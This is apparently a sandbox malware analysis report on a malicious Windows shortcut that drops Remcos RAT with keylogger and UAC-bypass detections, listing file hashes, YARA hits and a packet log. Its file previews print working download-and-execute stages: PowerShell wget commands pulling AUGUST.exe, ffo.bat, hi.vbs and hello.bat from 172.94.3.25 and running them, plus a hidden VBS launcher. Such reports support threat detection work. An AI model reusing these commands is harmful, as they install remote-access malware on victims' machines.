                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\demhwk, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 87%
                                        Joe Sandbox View:
                                        • Filename: MdkbG2pK4l.lnk, Detection: malicious, Browse
                                        • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                        • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                        Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1234044
                                        Entropy (8bit):7.641698815657688
                                        Encrypted:false
                                        SSDEEP:24576:pJ7RP83QjzweEpWlgBwn0xeRzJdIQlvC3/pSBWuR0H:pxq6weE0lgBVgJdnwPBuR0H
                                        MD5:098D0C011885D97B2F87FA67628DF744
                                        SHA1:7FB21158D3E2E05C55300E6661B07D0926EDAA30
                                        SHA-256:77C388ADAA608B74033BBF5C86090AB8293056DE2B6FFFDCBCE281BA499C6260
                                        SHA-512:1C80EED7E1CBBEEA9EBA34916D9E2EF3946774753FC4124CEA43284E9BE46DBAA6EA32806263F1888318FD304089EFA59BA9386034F23995CC3E6782016E00AF
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1234044
                                        Entropy (8bit):7.641699006020582
                                        Encrypted:false
                                        SSDEEP:24576:+J7RP83QjzweEpWlgBwn0xeRzJdIQlvC3/pSBWuR0H:+xq6weE0lgBVgJdnwPBuR0H
                                        MD5:078FFB5E81AA83A6463A8DED53CCBEE9
                                        SHA1:CF4D81BA015BE6DFEE50C589D47B6FFF4671401C
                                        SHA-256:871BC1C5673FCA6CA4949362A5980D7078603DF3206A8FF70619B1896A639343
                                        SHA-512:2A314A2384D37398B41325C642E4041E44301B324A12AE6324AB8C0AD40ABE19B5F85B613EE73A4A75055DC77FBA4F67EF3E738D07CEAF14703E17794FFB31E6
                                        Malicious:false
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):500224
                                        Entropy (8bit):6.590620352205087
                                        Encrypted:false
                                        SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                        MD5:6CA401F82443B673FCA7D7DDB0A05357
                                        SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                        SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                        SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\gps, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\gps, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\gps, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\gps, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\gps, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\gps, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 87%
                                        Joe Sandbox View:
                                        • Filename: MdkbG2pK4l.lnk, Detection: malicious, Browse
                                        • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                        • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):500224
                                        Entropy (8bit):6.590620352205087
                                        Encrypted:false
                                        SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                        MD5:6CA401F82443B673FCA7D7DDB0A05357
                                        SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                        SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                        SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 87%
                                        Joe Sandbox View:
                                        • Filename: MdkbG2pK4l.lnk, Detection: malicious, Browse
                                        • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                        • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                        Category:dropped
                                        Size (bytes):890
                                        Entropy (8bit):5.074549193620881
                                        Encrypted:false
                                        SSDEEP:24:8pHmYt6j2gDIlXUv36IfKTJxSsAVsHnuuhpm:8Zt6rDIlGJiV0VtuH
                                        MD5:B723D8F179AEEA3F07DA2DAD87CC2F31
                                        SHA1:4EA41E29717258185DF6597A94428469B8CC77BC
                                        SHA-256:FE2F4952D96406C2EFCAFDE91EB85D6EAFF99DC634A8B11DD40F590CD97AE60E
                                        SHA-512:781B908287C904DDCD5FE08CABCAF5A89D638DB1CFBF3AB35FE93D547FEF26BA5E4C13CF5ABDA6EE10C3CA20BBF441603415913A897982E3225AF87BA2D22E1D
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):4809996
                                        Entropy (8bit):7.988259707956486
                                        Encrypted:false
                                        SSDEEP:98304:+pbYDHaUeRG/GnYDievJRVrQo4QGB0s53+sTH7/93veWGLRHHk:+pbu9e+qYDiQf1hfGWsBVb/rGLhE
                                        MD5:25860926414BF43383246F7C773A8D6C
                                        SHA1:760390A4A14DF085F4C841067F52C79409CDC93E
                                        SHA-256:A8E552944846A2F5E8FEFEA4A250046DA29D74D1F58F7A868258E6DED9597958
                                        SHA-512:61825EF1B03F5516F2820FAAE3DAD01911054DEBB714B2162FD28CDC7C26199EB6174EDDB3E48A4B200C350A083A561A58BD2724496FCB71E87D4492E2EC5A07
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 3%
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                        Category:dropped
                                        Size (bytes):890
                                        Entropy (8bit):5.074549193620881
                                        Encrypted:false
                                        SSDEEP:24:8pHmYt6j2gDIlXUv36IfKTJxSsAVsHnuuhpm:8Zt6rDIlGJiV0VtuH
                                        MD5:B723D8F179AEEA3F07DA2DAD87CC2F31
                                        SHA1:4EA41E29717258185DF6597A94428469B8CC77BC
                                        SHA-256:FE2F4952D96406C2EFCAFDE91EB85D6EAFF99DC634A8B11DD40F590CD97AE60E
                                        SHA-512:781B908287C904DDCD5FE08CABCAF5A89D638DB1CFBF3AB35FE93D547FEF26BA5E4C13CF5ABDA6EE10C3CA20BBF441603415913A897982E3225AF87BA2D22E1D
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                        Category:dropped
                                        Size (bytes):890
                                        Entropy (8bit):5.074549193620881
                                        Encrypted:false
                                        SSDEEP:24:8pHmYt6j2gDIlXUv36IfKTJxSsAVsHnuuhpm:8Zt6rDIlGJiV0VtuH
                                        MD5:B723D8F179AEEA3F07DA2DAD87CC2F31
                                        SHA1:4EA41E29717258185DF6597A94428469B8CC77BC
                                        SHA-256:FE2F4952D96406C2EFCAFDE91EB85D6EAFF99DC634A8B11DD40F590CD97AE60E
                                        SHA-512:781B908287C904DDCD5FE08CABCAF5A89D638DB1CFBF3AB35FE93D547FEF26BA5E4C13CF5ABDA6EE10C3CA20BBF441603415913A897982E3225AF87BA2D22E1D
                                        Malicious:false
                                        Process:C:\Users\user\DZIPR.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):354304
                                        Entropy (8bit):6.005348176071358
                                        Encrypted:false
                                        SSDEEP:6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
                                        MD5:AD28D4167571382569D2384FFD7BD2A9
                                        SHA1:EFC7534BCB1645D4056702E073519F571D8DB77B
                                        SHA-256:F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
                                        SHA-512:8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Process:C:\Users\user\DZIPR.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):8767704
                                        Entropy (8bit):7.112848215947183
                                        Encrypted:false
                                        SSDEEP:196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
                                        MD5:EC9CE1D67F98072281015C7726FBA245
                                        SHA1:E89B16265ACF4A251B527DDF22830F2650987263
                                        SHA-256:9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
                                        SHA-512:21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Process:C:\Users\user\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):975374
                                        Entropy (8bit):7.888212877886324
                                        Encrypted:false
                                        SSDEEP:24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
                                        MD5:4649F3A4E58C6040B07F6D486C149A71
                                        SHA1:64F8FC631C5FB4E5F6BC20C207047D8E2B500587
                                        SHA-256:5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
                                        SHA-512:4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
                                        Malicious:false
                                        Process:C:\Users\user\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):72329
                                        Entropy (8bit):4.4816230098296295
                                        Encrypted:false
                                        SSDEEP:1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
                                        MD5:F125E72B3968CA233EF3C7E2F4DB34E7
                                        SHA1:4FB34044EF18CEDBD3EDE4272C44416D3F11735C
                                        SHA-256:CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
                                        SHA-512:B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):116
                                        Entropy (8bit):4.962458979597571
                                        Encrypted:false
                                        SSDEEP:3:mKDDGKSSJJFSpXLgLvzx0fyJAFAkKiv5iwW0r+KBpkiv5iwW0rv:hSGmp6vd0fy78ha0rhppha0rv
                                        MD5:174D3AD77319DC90564354CAD267DABF
                                        SHA1:B36284DCCF4F4D2A7E671D5A2F9DDA8197A4C351
                                        SHA-256:CE2A0FA3EF54C0596A6AA5E4D9E2F06943F0F7E38841823072BD37DF73C47569
                                        SHA-512:FA78883AF47A9B47D738DD8ACC2990A3CBA9339B8A762A7AC98114810A50F9085D223226D00944D814FCE5FF43114BC87656AFAF752D86AE08A8818B257A40FB
                                        Malicious:true
                                        Preview:@echo off..powershell wget http://172.94.3.25/AUGUST.exe -OutFile %APPDATA%/AUGUST.exe..start %APPDATA%/AUGUST.exe..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):191
                                        Entropy (8bit):5.080483099180641
                                        Encrypted:false
                                        SSDEEP:3:mKDDGKSSJJFSpXLgL+h9JAFAkKivDWMdzGSJJFSpXLgLLHLqXJAFAkKivNJKTmw9:hSGmp6+h978bWMdz9mp6LrqX78VgGppC
                                        MD5:4D8B2D19BDD29E6D89E0769CFF9B0B48
                                        SHA1:07C4469751A5DDF43288B8EA7D32AFCE71783A2C
                                        SHA-256:1F09EDF42FA70F1D36DF268EEF5B64EA5617485D1A511F674740DECFCEBDEA1E
                                        SHA-512:DD00356E9FDF149C9890BF71459A5E20B5BC581D62C7A3964A18AAFFB32BD7E5210CC9AA8D6251E87BA4BA3AC803B5E720C66ECF161A546A4D36409D1311D3DC
                                        Malicious:true
                                        Preview:@echo off..powershell wget http://172.94.3.25/ffo.bat -OutFile %APPDATA%/ffo.bat..powershell wget http://172.94.3.25/hi.vbs -OutFile %APPDATA%/hi.vbs..start /min cmd /c %APPDATA%/hi.vbs..exit
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):126
                                        Entropy (8bit):4.948021064615188
                                        Encrypted:false
                                        SSDEEP:3:jaPFEm8nByK2qQANX4E71wivDWMZcNUqJajaPOUC:j6NqEK20XNNbWMiNUqOUC
                                        MD5:CAA7E3E2DB71FA6B41370A69D134FDBA
                                        SHA1:659CEC895D5348E9E1B85823CC9A8F0E165F21CF
                                        SHA-256:183E1E3B20EA35804DDF2D6102AA4E854730A93F076BB6FE43075B0394D18945
                                        SHA-512:346F1858A1861D16BF8E858867DEAA1653124085C0C320A2776C1A8131E93E6AF15156EC6B8457B3648F837485AD4EAC584EE83B859F97CBAA80F38B2BF68EFD
                                        Malicious:true
                                        Preview:Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run chr(34) & "%APPDATA%/ffo.bat" & Chr(34), 0..Set WshShell = Nothing
                                        Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):354304
                                        Entropy (8bit):6.005348176071358
                                        Encrypted:false
                                        SSDEEP:6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
                                        MD5:AD28D4167571382569D2384FFD7BD2A9
                                        SHA1:EFC7534BCB1645D4056702E073519F571D8DB77B
                                        SHA-256:F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
                                        SHA-512:8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):8767704
                                        Entropy (8bit):7.112848215947183
                                        Encrypted:false
                                        SSDEEP:196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
                                        MD5:EC9CE1D67F98072281015C7726FBA245
                                        SHA1:E89B16265ACF4A251B527DDF22830F2650987263
                                        SHA-256:9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
                                        SHA-512:21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):975374
                                        Entropy (8bit):7.888212877886324
                                        Encrypted:false
                                        SSDEEP:24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
                                        MD5:4649F3A4E58C6040B07F6D486C149A71
                                        SHA1:64F8FC631C5FB4E5F6BC20C207047D8E2B500587
                                        SHA-256:5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
                                        SHA-512:4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):72329
                                        Entropy (8bit):4.4816230098296295
                                        Encrypted:false
                                        SSDEEP:1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
                                        MD5:F125E72B3968CA233EF3C7E2F4DB34E7
                                        SHA1:4FB34044EF18CEDBD3EDE4272C44416D3F11735C
                                        SHA-256:CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
                                        SHA-512:B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
                                        Malicious:false
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):298
                                        Entropy (8bit):3.551464552546624
                                        Encrypted:false
                                        SSDEEP:6:V5iF88fuXUEZglJPZOjzkjTtE9+AQy0lb0emQP1:VEGmuMJsX9+nVwemQt
                                        MD5:97FC0491F14E6206BAEF1D398606C19D
                                        SHA1:8660D9D3E15C4CACCA44AE3CAEA033B338F51D23
                                        SHA-256:A9BA5A9E4DA4402C7D9390FC8A20CABADEB0D73872A2D30A49054EE5036446E3
                                        SHA-512:FE741A2B476B695939CABCF4840AA4254F4D0C1FB90E763CD62C24CF563CF64452898ED91E5485E24CBA081960FE4DADC85133A18B4D0A4696D0239BF4D107DF
                                        Malicious:false
                                        Preview:... C:\Users\engineer\AppData\Roaming\Ruy_driverv2\DZIPR.exe ... ENGINEER-PC\engineer ...
                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=1, Archive, ctime=Mon Aug 26 12:29:30 2024, mtime=Mon Aug 26 12:29:30 2024, atime=Mon Aug 26 12:29:30 2024, length=278528, window=hidenormalshowminimized
                                        Entropy (8bit):4.444274641492051
                                        TrID:
                                        • Windows Shortcut (20020/1) 100.00%
                                        File name:Dlr7HYI6VL.lnk
                                        File size:1'389 bytes
                                        MD5:383bec1808c99dcffafa9f4e03f104a4
                                        SHA1:2f3647ea4331f7848de1c96cef6427b7136ab835
                                        SHA256:be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850
                                        SHA512:ddb859691e290bb1f4180c086ca92d385918f497506b1b9dc0b1f10b71acb24259b34020b032fb25af64a3ba628e423381106a538e7539f8d9c2617cee11c617
                                        SSDEEP:24:8GJdPVzSPFA21SGfUvAY4I0WxwQ13idyD11BabQvORhtC/5:8yNzAuD0Id13iyD11Baj
                                        TLSH:2C21D00967EB8235D2B7993A6D9AE715DB10FC4297438F5B05D4514EBC13211A418F1B
                                        Icon Hash:74f4d4dcdcc9e1ed

                                        General

                                        Relative Path:
                                        Command Line Argument:/c powershell wget http://172.94.3.25/hello.bat -OutFile %APPDATA%/hello.bat && %APPDATA%/hello.bat
                                        Icon location:%SystemRoot%\System32\SHELL32.dll
                                        Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                        Sep 25, 2024 18:40:28.055372000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055407047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055452108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055489063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055529118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055727005 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055757999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055788040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055792093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055849075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055883884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055907965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055938005 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055974007 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055978060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056008101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056042910 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.056374073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056404114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056435108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056438923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.056494951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056524038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056530952 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.056555033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056585073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056587934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057001114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057029963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057035923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057060957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057095051 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057221889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057267904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057298899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057306051 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057408094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057447910 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057454109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057485104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057512999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057519913 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057543039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057571888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057576895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057604074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057638884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.058073997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058124065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058159113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.058171988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058202028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058231115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058237076 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.058260918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058294058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058295965 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.058326006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058361053 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.058362007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058393002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058429003 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.059036970 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059087038 CEST8049716172.94.3.25192.168.2.6
